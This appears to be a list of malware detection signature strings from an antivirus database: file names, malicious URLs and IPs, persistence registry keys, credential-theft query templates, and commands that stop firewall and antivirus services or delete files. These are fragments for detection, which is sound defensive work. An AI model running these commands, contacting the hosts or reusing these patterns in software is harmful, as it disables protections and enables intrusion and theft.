- cmd.exe (PEHSTR_EXT)
- https://astexproject.com/ (PEHSTR_EXT)
- https://store2.gofile.io/download/ (PEHSTR_EXT)
- 0.30319\RegAsm.exe (PEHSTR_EXT)
- 877689582395719724/8776900 (PEHSTR_EXT)
- winomoera.operavnb (PEHSTR_EXT)
- KafeOtomasyon.cs (PEHSTR_EXT)
- Debug\KafeOtomasyon (PEHSTR_EXT)
- https:// (PEHSTR_EXT)
- 0.000webhostapp.com/Document.exe (PEHSTR_EXT)
- 0.000webhostapp.com/RunPE.dll (PEHSTR_EXT)
- RunPE.RunPE (PEHSTR_EXT)
- http://176.111.174.107/Api/GetTask/ (PEHSTR_EXT)
- http://176.111.174.107/chrome.zip (PEHSTR_EXT)
- UGFIOEHFGIEFIUKUF.Properties.Resources (PEHSTR_EXT)
- ClientHost.exe (PEHSTR_EXT)
- HJD.Pexeso.FormGUI (PEHSTR_EXT)
- DataDirectory|\bin\Debug\PayrollManagerDB.mdf (PEHSTR_EXT)
- steal\Release\gtasteal.pdb (PEHSTR_EXT)
- Agent SBU (PEHSTR_EXT)
- TdDPKD|ET]D\IDjDThDzJDlETeDXJD}EzfDHHDEDDFDjGDDD (PEHSTR_EXT)
- TdDTKDvETgD3HDDDDDDXJDwET\D7HD3Ez\DXKDnEzeDLKDTE (PEHSTR_EXT)
- DDDD7JDyETdDPKD|ET]D\IDjD (PEHSTR_EXT)
- DDDDDDzDjODHGDxDTPD7FD}DDDD7JDyETdDPKD|ET]D\IDjD (PEHSTR_EXT)
- DDDj{{kq;.p2r6WNXvwRn..y.PhvDLTL|7UEhoR5e3<rjxmp (PEHSTR_EXT)
- GDIiD:D\LDDDDDOEKD9DD9KnFDJFDDDDjULGjRIvzEmDznDD (PEHSTR_EXT)
- DDDPGHDvED6DDZ\\LDDDDD|DPDeLjXHfJDWFDDDDjP7FzJEL (PEHSTR_EXT)
- 000webhostapp.com/RunPE.dll (PEHSTR_EXT)
- trevnoC.metsyS (PEHSTR_EXT)
- gsdf.ex (PEHSTR_EXT)
- session.ses (PEHSTR_EXT)
- Sy!stem.Refl!ection.As!sembly (PEHSTR_EXT)
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR_EXT)
- TVqQAAMAAAAEAAAA// (PEHSTR_EXT)
- //8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA (PEHSTR_EXT)
- http://xz.8dashi.com/ (PEHSTR_EXT)
- CurrentVersion\Uninstall\baitushow (PEHSTR_EXT)
- Host: xz.8dashi.com (PEHSTR_EXT)
- SmartAssembly.SmartExceptionsCore.Resources.current.png (PEHSTR_EXT)
- Aweiiwi.exe (PEHSTR_EXT)
- bin\Debug\SLN\HotelManagementSystem\obj\Debug\HotelManagementSystem.pdb (PEHSTR_EXT)
- HotelManagementSystem.exe (PEHSTR_EXT)
- WinMixer.Properties.Resources (PEHSTR_EXT)
- klinikdb.mdf (PEHSTR_EXT)
- model1.context.tt (PEHSTR_EXT)
- model1.tt (PEHSTR_EXT)
- klinikdb_log.ldf (PEHSTR_EXT)
- Model1.ssdl (PEHSTR_EXT)
- System.Reflection.Assembly (PEHSTR_EXT)
- get_Http (PEHSTR_EXT)
- #fsdghcggfsdfsd.dll# (PEHSTR_EXT)
- #fsdhcfsdf.dll# (PEHSTR_EXT)
- #fsdhhahffdsf.dll# (PEHSTR_EXT)
- #fsdghhhhhhsdgfdsf.dll# (PEHSTR_EXT)
- #fsdhhaffdsf.dll# (PEHSTR_EXT)
- #fshggdfsshgfhdfsdf.dll# (PEHSTR_EXT)
- #fsdfsdggfdsf.dll# (PEHSTR_EXT)
- Discord Link : v1.0.0-custom (PEHSTR_EXT)
- #sssssssss.dll# (PEHSTR_EXT)
- #fshghhhgfgggghdfsdf.dll# (PEHSTR_EXT)
- #fsdfgdddddfchafhghgsdf.dll# (PEHSTR_EXT)
- I.n.v.o.k.e (PEHSTR_EXT)
- http://q1212.me/Vv/ (PEHSTR_EXT)
- fds.dll# (PEHSTR_EXT)
- zVBVmpePme0ebI7f6uX.c7ZoAXerow2pBEq3fKU.resources (PEHSTR_EXT)
- 000webhostapp.com (PEHSTR_EXT)
- InitializeComponent (PEHSTR_EXT)
- GarageManager.Properties.Resources.resources (PEHSTR_EXT)
- lld.tnemeganaM.metsyS (PEHSTR_EXT)
- lld.metsyS (PEHSTR_EXT)
- lld.gniwarD.metsyS (PEHSTR_EXT)
- lld.eroC.metsyS (PEHSTR_EXT)
- exeniw:tegrat/ +gubed/ 68X:mroftalp/ +ezimitpo/ (PEHSTR_EXT)
- https://buysrilankan.lk/k/ (PEHSTR_EXT)
- http://179.43.187.131/ueyt/ (PEHSTR_EXT)
- #hdfffwtwfffffffgsssssdf.dll# (PEHSTR_EXT)
- #fffswtf.dll# (PEHSTR_EXT)
- DecompressString (PEHSTR_EXT)
- D:\Workspace\Crypted\a.pdb (PEHSTR_EXT)
- wcfgmgr32.exe (PEHSTR_EXT)
- quick_screen_recorder.Properties.Resources (PEHSTR_EXT)
- //github.com/ModuleArt/ (PEHSTR_EXT)
- .compressed (PEHSTR_EXT)
- Nebula__Web_Browser_.Resources (PEHSTR_EXT)
- SubFrameCalculator.Resources (PEHSTR_EXT)
- //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- Stub.exe (PEHSTR_EXT)
- Stub.pdb (PEHSTR_EXT)
- @179.43.187.131@ (PEHSTR_EXT)
- papworld.net (PEHSTR_EXT)
- CaptureScreen (PEHSTR_EXT)
- SendScreenShot (PEHSTR_EXT)
- dsadfffwtwfffffffgsssssdf.dll# (PEHSTR_EXT)
- #hsstadaaadwsssssg.dll# (PEHSTR_EXT)
- #hsstaaadwsssssg.dll# (PEHSTR_EXT)
- #fasdgsfsd.dll# (PEHSTR_EXT)
- #afa.dll# (PEHSTR_EXT)
- #ssstaaaaaawsssss.dll# (PEHSTR_EXT)
- #fffdsaswtf.dll# (PEHSTR_EXT)
- #fsdadsadsdaswdf.dll# (PEHSTR_EXT)
- #adsadddddddadadaaws.dll# (PEHSTR_EXT)
- Test-Connection www.bing.com (PEHSTR_EXT)
- Stub.Resources (PEHSTR_EXT)
- ClassLibrary1.RunPE (PEHSTR_EXT)
- //pastebin.com/raw.php?i= (PEHSTR_EXT)
- CheckBoxStudio.WinForms.Properties.Resources.resources (PEHSTR_EXT)
- #hdfsafaaaadadsadfffwtwfffffffgsssssdf.dll# (PEHSTR_EXT)
- #ddshsstadaaadwsssssg.dll# (PEHSTR_EXT)
- #agffa.dll# (PEHSTR_EXT)
- #f.dgdddll# (PEHSTR_EXT)
- twitter.com (PEHSTR_EXT)
- \1.tmp.bat (FILEPATH)
- \temp\1.tmp.bat (FILEPATH)
- system32\regsvr32 /s (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects (PEHSTR_EXT)
- WINDOWS\system32\scvhost.exe (PEHSTR)
- virtual-net.pisem.su/Nick.gif (PEHSTR)
- f:\source\cg\cgall\wmgj\wmgjexe (PEHSTR)
- Mcmd=1&usrname=%s&usrpass=%s&servername=%s&bankpass=%s&nickname=%s&rankinfo=%d (PEHSTR)
- C:\WINDOWS\~Temp (PEHSTR_EXT)
- c:\home\mwtest\tmp\w.exe (PEHSTR_EXT)
- c:\windows\system32\1.exe (PEHSTR_EXT)
- http://getyouneed.com/r.php?wm=5 (PEHSTR)
- http://getyouneed.co (PEHSTR)
- http://www.shadowmp3.com (PEHSTR)
- ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb (PEHSTR)
- =Browser Helper Objects\{CE7C3CF0-25FC-11D1-ABED-784B7D6BE0B3} (PEHSTR)
- 3winferno.com/c/407/freeze_rpc6bundle_us/REGISTRYFIX (PEHSTR)
- rundll32.exe "%s",RPCInstall (PEHSTR)
- RPCInstall.dll (PEHSTR)
- 1Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR)
- &ieopen.yhgames.com/iedown/jdupdate.txt (PEHSTR)
- "SYSTEM\CurrentControlSet\Services\ (PEHSTR)
- @Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- pSoftware\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BD49A3ED-9645-4F06-AC3B-09231CAD748C} (PEHSTR)
- xsts.exe (PEHSTR)
- dlsts.dll (PEHSTR)
- PHacker_C.dll (PEHSTR)
- PHacker.ini (PEHSTR)
- lec.nevysearch.com (PEHSTR)
- update1.upmachines.com (PEHSTR)
- /qn /x (PEHSTR_EXT)
- SOFTWARE\Eset\Nod\CurrentVersion\Modules\AMON\Settings\Config000\Settings (PEHSTR_EXT)
- :_msiexec.exe (PEHSTR_EXT)
- http://alert-ca.com/counter1/fout.php (PEHSTR_EXT)
- cmd /c t.bat (PEHSTR_EXT)
- http://%77%77%77%2E%6B%61%6E%67%6B%2E%63%6E/%74%65%6D%70%2E%68%74%6D%6C (PEHSTR_EXT)
- Software\Microsoft (PEHSTR_EXT)
- HTTP/1.0 (PEHSTR_EXT)
- \explorer.exe (PEHSTR_EXT)
- ://www.baidu.com (PEHSTR_EXT)
- http://0xda%2e0x10%2e0x78%2e0xfd/ie%2etxt (PEHSTR_EXT)
- ie_up.exe (PEHSTR_EXT)
- http://0xda%2e0x10%2e0x78%2e0xfd/ie_up%2eexe (PEHSTR_EXT)
- http://uu.f126.com/ie.txt (PEHSTR_EXT)
- http://uu.f126.com/ie_up.exe (PEHSTR_EXT)
- http://www.91880.com (PEHSTR_EXT)
- KeServiceDescriptorTable (PEHSTR_EXT)
- DisableScriptDebuggerIE (PEHSTR_EXT)
- bho.dll (PEHSTR_EXT)
- play.dll (PEHSTR_EXT)
- ser.exe (PEHSTR_EXT)
- miniup.exe (PEHSTR_EXT)
- \1.exe (PEHSTR)
- \2.exe (PEHSTR)
- .exe (PEHSTR)
- Hpowershell -inputformat none -outputformat none -NonInteractive -Command (PEHSTR)
- 620c733d900d5.com/ (PEHSTR)
- addInstall.php (PEHSTR)
- \\.\pipe\$%d$ (PEHSTR_EXT)
- ftp:// (PEHSTR_EXT)
- Gecko/20070309 Firefox/2.0.0.3 (PEHSTR_EXT)
- \SMS1000Main\html\ (PEHSTR)
- \SMS1000Update\HsAc (PEHSTR)
- .sms1000.co.kr/App/upapp/ (PEHSTR)
- ControlNotifier/newagree.dat (PEHSTR)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\\{20ad49a2-94f3-42bd-f434-2604812c897c} (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\\{25ad49a2-94f3-42bd-f434-2604812c897d} (REGKEY)
- \botnet (PEHSTR_EXT)
- BotNet/0.1 (compatible) (PEHSTR_EXT)
- /botnet/bho.dll (PEHSTR_EXT)
- http://67. (PEHSTR_EXT)
- botnet/loader.jsp (PEHSTR_EXT)
- !C:\WINDOWS\SYSTEM32\MSService.exe (PEHSTR)
- %http://df20.dot5hosting.com/~shitshir (PEHSTR)
- pSYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List (PEHSTR)
- POST /mnhbckjmdhckj.php? (PEHSTR_EXT)
- =v26MmjSyS (PEHSTR_EXT)
- data=ujnT32O/F9qsDyA (PEHSTR_EXT)
- User-Agent: wget 3.0 (PEHSTR_EXT)
- POST /fakbwq.php? (PEHSTR_EXT)
- data=vzjcw2q/ (PEHSTR_EXT)
- POST /bskcua.php? (PEHSTR_EXT)
- User-Agent: Mozilla/6.0 (Windows; wget 3.0) (PEHSTR_EXT)
- .php? (PEHSTR_EXT)
- == HTTP/1.1 (PEHSTR_EXT)
- rsvp.exe (PEHSTR_EXT)
- \LOCALS~1\APPLIC~1\MICROS~1\ (PEHSTR_EXT)
- esentutl.exe (PEHSTR_EXT)
- cisvc.exe (PEHSTR_EXT)
- mqtgsvc.exe (PEHSTR_EXT)
- ieudinit.exe (PEHSTR_EXT)
- dllhst3g.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (PEHSTR_EXT)
- clipsrv.exe (PEHSTR_EXT)
- sessmgr.exe (PEHSTR_EXT)
- mstinit.exe (PEHSTR_EXT)
- comrepl.exe (PEHSTR_EXT)
- logman.exe (PEHSTR_EXT)
- cmstp.exe (PEHSTR_EXT)
- spoolsv.exe (PEHSTR_EXT)
- start http:// (PEHSTR)
- /c echo a > \System32\ (PEHSTR)
- '\cmd.exe /c start \System32\winn32t.exe (PEHSTR)
- winzz.exe (PEHSTR)
- winn32t.exe (PEHSTR)
- 81.209.112. (PEHSTR)
- http://arpp0934.iespana.es\ (PEHSTR_EXT)
- beep.sys (PEHSTR_EXT)
- sbl.sys (PEHSTR_EXT)
- \cdsss.exe (PEHSTR_EXT)
- \vn88.exe (PEHSTR_EXT)
- /mim/ (PEHSTR_EXT)
- 0123456789.exe (PEHSTR_EXT)
- bIS0dEpwM2uid3CmdoOsfT5sZXKid2mrbT (PEHSTR_EXT)
- %s\%s%s.%s (PEHSTR_EXT)
- newqq\AdWin (PEHSTR_EXT)
- C:\up.dll (PEHSTR_EXT)
- Software\Happyd (PEHSTR)
- http://anty.freehostia.com/xxx/d (PEHSTR)
- logo.png (PEHSTR)
- ftp.narod.ru (PEHSTR)
- %s\Nt_File_Temp\%d.tmp (PEHSTR_EXT)
- %windir%\Nt_File_Temp\list.tmp (PEHSTR_EXT)
- http://513389.cn/ (PEHSTR_EXT)
- http://www.alanga.net/ (PEHSTR_EXT)
- http://countdutycall.info/1/ (PEHSTR_EXT)
- /c C:\TEMP\ (PEHSTR_EXT)
- .bat "C:\myapp.exe" (PEHSTR_EXT)
- 85.17.60. (PEHSTR_EXT)
- HttpSendRequestA (PEHSTR_EXT)
- rundll32.exe "%s",B (PEHSTR_EXT)
- LoadAppInit_DLLs (PEHSTR_EXT)
- http://onlinesearch4meds.com (PEHSTR_EXT)
- GetComputerNameExA (PEHSTR_EXT)
- Screen Capture (PEHSTR_EXT)
- 0bempbe/qiq (PEHSTR_EXT)
- traff4all.biz (PEHSTR_EXT)
- vxv.php (PEHSTR_EXT)
- cntr.php (PEHSTR_EXT)
- svcp.csv (PEHSTR_EXT)
- %s\vx (PEHSTR_EXT)
- tibs. (PEHSTR_EXT)
- proxy. (PEHSTR_EXT)
- zgame1.exe (PEHSTR_EXT)
- kernels8.exe (PEHSTR_EXT)
- software\microsoft\windows\currentversion\internet settings\\minlevel (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\ranges\range1\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\domains\slotch.com\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\domains\ysbweb.com\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\\trust warning level (REGKEY)
- Software\microsoft\windows\currentversion\internet settings\zonemap\domains\porn-host.org\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\domains\blazefind.com\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\domains\skoobidoo.com\\* (REGKEY)
- software\microsoft\windows\currentversion\internet settings\zonemap\domains\slotchbar.com\\* (REGKEY)
- &a=1 HTTP/1.1 (PEHSTR_EXT)
- GET /dl?w= (PEHSTR_EXT)
- 66.117.37.7 (PEHSTR_EXT)
- /autodetect.exe (PEHSTR_EXT)
- %s\C:\WINDOWS\Sy (PEHSTR)
- http://w (PEHSTR)
- 5Software\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR)
- explorer.exe (PEHSTR)
- \regcheck (PEHSTR)
- /spambot (PEHSTR)
- a.bat (PEHSTR_EXT)
- file.php?&ID=%s&EXE= (PEHSTR_EXT)
- dalexcars.com (PEHSTR)
- GET /intercooler (PEHSTR)
- Host: www. (PEHSTR)
- 'User-Agent: Mozilla/4.0 (compatible; 1- (PEHSTR)
- /users/mulez/ (PEHSTR)
- %s\%s%d.exe (PEHSTR)
- Mozilla/4.0 (compatible) (PEHSTR_EXT)
- %s\%s (PEHSTR_EXT)
- http://max-stats.com (PEHSTR_EXT)
- http://sc-cash.com (PEHSTR_EXT)
- www.teen4-sex.com (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\pref (PEHSTR_EXT)
- c2.php?i= (PEHSTR_EXT)
- winlogon32. (PEHSTR_EXT)
- http://yupsearch.com (PEHSTR_EXT)
- /silent_install.exe (PEHSTR_EXT)
- /sideb.exe (PEHSTR_EXT)
- \%ld%d.exe (PEHSTR_EXT)
- http://toolbarpartner.com (PEHSTR_EXT)
- /installed.php?wm= (PEHSTR_EXT)
- /programs.txt (PEHSTR_EXT)
- http://sturfajtn.com (PEHSTR_EXT)
- /w.php (PEHSTR_EXT)
- /load.txt (PEHSTR_EXT)
- %WINDIR%\System32\$$$ (PEHSTR_EXT)
- regsvr32 /s (PEHSTR_EXT)
- %SystemRoot%\sys (PEHSTR_EXT)
- %i%i.dll (PEHSTR_EXT)
- %i%i.exe (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR_EXT)
- %WINDIR%\System32\ (PEHSTR_EXT)
- @del %0a.bat C:\myapp.exe (PEHSTR_EXT)
- TND1http://85.255.119 (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\origami (PEHSTR_EXT)
- wininet.dll (PEHSTR_EXT)
- psapi.dll (PEHSTR_EXT)
- ##ws2_32.dll (PEHSTR_EXT)
- ##%d.exe (PEHSTR_EXT)
- @@svchost.exe (PEHSTR_EXT)
- ##http://64.27.0.205 (PEHSTR_EXT)
- 216.255.189.85 (PEHSTR_EXT)
- w:\work\vcprj\prj\downloader\Release\injdldr.pdb (PEHSTR_EXT)
- http://64.27.0.205/up/calc2.bin (PEHSTR_EXT)
- %s\t%d.exe (PEHSTR_EXT)
- .?AVtype_info@@ (PEHSTR_EXT)
- NSAPI.dll (PEHSTR_EXT)
- HttpQueryInfoA (PEHSTR_EXT)
- icrosoft\Active Setup\Installed (PEHSTR)
- .SPIRIT (PEHSTR)
- shellexecute=RECYCLER\systems.com (PEHSTR_EXT)
- open=systems.com (PEHSTR_EXT)
- shellexecute=systems.com (PEHSTR_EXT)
- shell\start\command=systems.com (PEHSTR_EXT)
- shell\read\command=explorer.exe (PEHSTR_EXT)
- shell\start\command=RECYCLER\systems.com (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\system (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- taskmger.com (PEHSTR_EXT)
- \RECYCLER\systems.com (PEHSTR_EXT)
- \system32\taskmger.com (PEHSTR_EXT)
- \dllcache\svchost.exe (PEHSTR_EXT)
- C:\TestFiles\win.ini (PEHSTR_EXT)
- \system.bak (PEHSTR_EXT)
- \system.log (PEHSTR_EXT)
- \systhecatmsg.gif (PEHSTR_EXT)
- EXE (PEHSTR_EXT)
- \sysmsgprocess (PEHSTR_EXT)
- http://www.455465x.com/test/IP.asp (PEHSTR_EXT)
- QQ.exe (PEHSTR_EXT)
- \themsgmove.exe (PEHSTR_EXT)
- \autorun.in (PEHSTR_EXT)
- .x/txt.txt (PEHSTR_EXT)
- \mshntfy16.dat (PEHSTR_EXT)
- \mshd (PEHSTR_EXT)
- QSoftware\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR)
- %s\progmon.exe (PEHSTR)
- %s\internt.exe (PEHSTR)
- c:\sss.scr (PEHSTR)
- c:\sss1.scr (PEHSTR)
- c:\sss2.scr (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo1.exe (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo2.exe (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo3.exe (PEHSTR)
- http://www.ip2location.com/ (PEHSTR_EXT)
- ShellExecuteExA (PEHSTR_EXT)
- comspec (PEHSTR_EXT)
- /c del " (PEHSTR_EXT)
- %sRundll32.exe "%s%s",DllCanUnloadNow (PEHSTR_EXT)
- RUNDLL32 "%s" Start (PEHSTR_EXT)
- tspop.sys (PEHSTR_EXT)
- tsbho.dll (PEHSTR_EXT)
- tspopdll.cab (PEHSTR_EXT)
- tspopsys.cab (PEHSTR_EXT)
- tsbho.cab (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\%s (PEHSTR_EXT)
- Wininet.dll (PEHSTR_EXT)
- |Options.InfectFiles= (PEHSTR)
- KeyLogger.Active (PEHSTR)
- |Options.DeactiveKasperSky= (PEHSTR)
- /Google_files/hp (PEHSTR_EXT)
- Software\Microsoft\new WWW\vars (PEHSTR_EXT)
- Software\Microsoft\WebServer Data (PEHSTR_EXT)
- /C net view >c:\nv (PEHSTR)
- :ExeDelete (PEHSTR)
- del %ExePath% (PEHSTR)
- !if exist %ExePath% goto ExeDelete (PEHSTR)
- del %BatPath% (PEHSTR)
- >http://g1.globo.com/Noticias/SaoPaulo/0,,MUL73439-5605,00.html (PEHSTR)
- c:\winupdte.exe (PEHSTR)
- +http://globonoticia.iitalia.com/noticia.com (PEHSTR)
- c:\temp.bat (PEHSTR)
- \ucleaner_setup.exe (PEHSTR)
- \s2f.exe (PEHSTR)
- \Casino.ico (PEHSTR)
- \Spyware Remover.ico (PEHSTR)
- /program/ (PEHSTR_EXT)
- a-zA-Z0-9._/-Setup.exe (PEHSTR_EXT)
- *http://nemesis.feed.parkingspa.com/Nemesis (PEHSTR)
- ;C:\Program Files\DomainSpa\Nemesis\Client\NemesisClient.exe (PEHSTR)
- %s\%s.exe (PEHSTR_EXT)
- %s\regsvr32.exe "%s" %s (PEHSTR_EXT)
- .co.kr/ (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\*.* (PEHSTR_EXT)
- <notepod.exe\shell\open\command (PEHSTR)
- C:\WINDOWS\SYSTEM32\rsvp.exe (PEHSTR)
- &"C:\WINDOWS\SYSTEM32\notepod.exe" "%1" (PEHSTR)
- @Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt (PEHSTR)
- http://www.jesuser.cn/plug/doSelect.asp?CMD=%s (PEHSTR_EXT)
- http://www.qqhudong.cn/usersetup.asp?action= (PEHSTR_EXT)
- \sv//ch//ost//.e//xe// (PEHSTR_EXT)
- common (PEHSTR_EXT)
- exec (PEHSTR_EXT)
- w\\dl\\l (PEHSTR_EXT)
- nexec (PEHSTR_EXT)
- /search?client= (PEHSTR_EXT)
- www.google.cn (PEHSTR_EXT)
- /search?q= (PEHSTR_EXT)
- /url?sa= (PEHSTR_EXT)
- ftp://ggss:xsw2xsw2@g (PEHSTR_EXT)
- .adfirefox.cn/g (PEHSTR_EXT)
- /gcon.dat (PEHSTR_EXT)
- /gkey.dat (PEHSTR_EXT)
- gcon.dat (PEHSTR_EXT)
- gkey.dat (PEHSTR_EXT)
- SOFTWARE\Microsoft\WAB\Export (PEHSTR_EXT)
- wininit. (PEHSTR_EXT)
- \usrinit.dll (PEHSTR_EXT)
- http://www.alxup.com/bin/Up.ini (PEHSTR_EXT)
- \UpAuto.ini (PEHSTR_EXT)
- AutoUp.exe (PEHSTR_EXT)
- CoMarshalInterThreadInterfaceInStream (PEHSTR_EXT)
- http://65.243.103. (PEHSTR_EXT)
- http://89.188.16. (PEHSTR_EXT)
- Software\Microsoft\MS Juan (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\comm.xml (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer (PEHSTR_EXT)
- comm.php (PEHSTR_EXT)
- newuser.php (PEHSTR_EXT)
- Down.dll (PEHSTR_EXT)
- sploso.com (PEHSTR_EXT)
- hellExecuteA (PEHSTR_EXT)
- \file.exe (PEHSTR_EXT)
- http://www.comegoto.com/host.jpg (PEHSTR_EXT)
- delme.bat (PEHSTR_EXT)
- nonome.bat (PEHSTR_EXT)
- http://kokovs.cc/porno/stat.php (PEHSTR_EXT)
- Software\JavaSoft\Prefs (PEHSTR_EXT)
- logo.png (PEHSTR_EXT)
- http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9 (PEHSTR_EXT)
- http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read (PEHSTR_EXT)
- http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s (PEHSTR_EXT)
- %s\test_file1234.txt (PEHSTR_EXT)
- Software\LifeTimePorn (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
- "%s" /VERYSILENT (PEHSTR_EXT)
- /REGISTRYFIX.EXE (PEHSTR_EXT)
- c:\RPCInstall\Release\RPCInstall.pdb (PEHSTR_EXT)
- Install Service Success,Ready Execute Work Thread... (PEHSTR_EXT)
- No Find Service,Ready Install Service... (PEHSTR_EXT)
- No Find RedGirl Server,Installing... (PEHSTR_EXT)
- htmlfile\shell\open\command (PEHSTR_EXT)
- %s Inject To Browser... (PEHSTR_EXT)
- \tmp.bat (PEHSTR_EXT)
- /search.php?q=%s&adv=%d&id=%d&s=%d (PEHSTR_EXT)
- 10trustedsites.com (PEHSTR_EXT)
- top10searches.net (PEHSTR_EXT)
- top20searches.net (PEHSTR_EXT)
- Content-Type: text/html; charset=UTF-8 (PEHSTR_EXT)
- search.msn.com/results.aspx (PEHSTR_EXT)
- 360Safe.exe (PEHSTR_EXT)
- antiarp.exe (PEHSTR_EXT)
- \svchost.dll (PEHSTR_EXT)
- Global\IPRIP (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\IPRIP (PEHSTR_EXT)
- cmd.exe /c net start %s & del "%s" (PEHSTR_EXT)
- Applications\iexplore.exe\shell\open\command (PEHSTR_EXT)
- wordpad.exe (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- Hardware\Description\System\CentralProcessor\0 (PEHSTR_EXT)
- 360Tray.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\. (PEHSTR_EXT)
- /msword/search/ (PEHSTR_EXT)
- /exel/download/ (PEHSTR_EXT)
- /window/stop/ (PEHSTR_EXT)
- /pascal/find/ (PEHSTR_EXT)
- /xp/run/ (PEHSTR_EXT)
- VBScript (PEHSTR_EXT)
- 0/kills.txt?time= (PEHSTR_EXT)
- %d.%d.%d.%d (PEHSTR_EXT)
- Msxml2.DOMDocument (PEHSTR_EXT)
- /size.php (PEHSTR_EXT)
- HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Somefox (PEHSTR_EXT)
- Software\Microsoft\Windows NT\CurrentVersion\Windows (PEHSTR_EXT)
- http://hqsextube08.com/getsoft/task.php?v= (PEHSTR_EXT)
- \Adobe\Manager.exe (PEHSTR_EXT)
- \crc.dat (PEHSTR_EXT)
- Ie6PatchBar.exe (PEHSTR_EXT)
- Kb83830597TmpNew.exe (PEHSTR_EXT)
- down1.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Setup\{250D8FBA-AD11-11D023-98A823-08002423102} (PEHSTR_EXT)
- AppEvent.exe (PEHSTR_EXT)
- &RESSDT.exe (PEHSTR)
- \RESSDT.sys (PEHSTR)
- \sysave.exe (PEHSTR)
- Rcmd.exe /c echo ping 127.1 -n 4 >nul 2>nul >"C:\Program Files\sys.bat" & echo del (PEHSTR)
- xcmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled (PEHSTR)
- /stop McShield&net stop "Norton AntiVirus Server (PEHSTR)
- .C:\Program Files\Rising\AntiSpyware\ieprot.dll (PEHSTR)
- birdluck6.cn/root/sysupdate (PEHSTR)
- http://wmjqr.cn (PEHSTR_EXT)
- %s\syscheck.exe (PEHSTR_EXT)
- Internet Explorer\IEXPLORE.EXE" http://www.178gg.com/lianjie/ (PEHSTR_EXT)
- \fresh.exe (PEHSTR_EXT)
- taourl.com (PEHSTR_EXT)
- /UVVh (PEHSTR)
- &tytul=Tibissa.com&tresc=Nazwa%20konta: (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\System (PEHSTR_EXT)
- .gif%3E <br> ........ (PEHSTR_EXT)
- \ocsdebug.txt (PEHSTR_EXT)
- >Zobacz%20postac%20na%20Tibia.com<a>+<br>+<a%20href=https://secure.tibia.com/account/?subtopic=accountmanagement>Zaloguj%20sie%20na%20Tibia.com<a>+<br>+<a%20href=http://tibia.pl/earth.php?x= (PEHSTR_EXT)
- &tytul=Tibissa.com&tresc=Account%20name: (PEHSTR_EXT)
- <br><a%20href=http://www.tibia.com/community/?subtopic=characters%26name= (PEHSTR_EXT)
- .gif%3E<br>Identyfikator: (PEHSTR_EXT)
- vcltest3.dll (PEHSTR_EXT)
- >Informations%20from%20Tibia.com<a>+<br>+<a%20href=https://secure.tibia.com/account/?subtopic=accountmanagement>Login%20to%20Tibia.com<a>+<br>+<a%20href=http://tibia.pl/earth.php?x= (PEHSTR_EXT)
- \esentprf.ini (PEHSTR_EXT)
- sc.exe stop (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- http\shell\open\command (PEHSTR_EXT)
- %s.old (PEHSTR_EXT)
- msagent (PEHSTR_EXT)
- %s\%s\%s%s (PEHSTR_EXT)
- %s\dllcache\%s.sys (PEHSTR_EXT)
- ipfltdrv.sys (PEHSTR_EXT)
- cmd.exe /C ping.exe 127.0.0.1 & del " (PEHSTR_EXT)
- sc.exe start (PEHSTR_EXT)
- \WINDOWS\system32\regsvr32.exe (PEHSTR_EXT)
- 58.49.58.20 (PEHSTR_EXT)
- sc.exe description (PEHSTR_EXT)
- \WINDOWS\sc.exe (PEHSTR_EXT)
